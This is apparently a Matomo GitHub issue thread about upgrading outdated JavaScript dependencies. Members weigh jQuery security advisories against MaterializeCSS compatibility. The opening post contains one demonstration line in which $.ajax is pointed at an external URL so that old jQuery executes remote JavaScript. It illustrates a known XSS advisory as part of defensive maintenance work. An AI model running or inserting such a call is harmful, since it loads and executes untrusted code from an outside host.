@Findus23 opened this Issue on May 23rd 2018 Member

I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328, which affects all jQuery versions <3.0.0.
Simply said, running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in https://github.com/matomo-org/matomo/commit/99793151cd6d4f318b7a011509bd421685f0537a) to fall back to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies

@tsteur commented on May 23rd 2018 Member

Just FYI: MaterializeCSS is not compatible with jQuery 3+ in case it was planned to update to a newer jquery major version.

@Findus23 commented on May 23rd 2018 Member

@tsteur It seems like the fix has already been merged a year ago and will be released soon:
https://github.com/Dogfalo/materialize/issues/3201

But I wouldn't be surprised if a lot of other things stop working.

@tsteur commented on May 23rd 2018 Member

@Findus23 that will be in MaterializeCSS 1.0, but we are likely not compatible with that version and may need to update a bit of code and plugins to make that work (to be tested). Just saying we may not be easily able to upgrade to that version, and only as part of Matomo 4.0, as it may be hard for plugins to keep themselves compatible with the 0.X version and 1.X version of MaterializeCSS etc. But maybe it is not really an issue; it is just a matter of testing and seeing how much we need to change and what. Most of the logic is centralized so it might not be too bad.

@Findus23 commented on October 12th 2018 Member

BTW: MaterializeCSS 1.0 just came out.
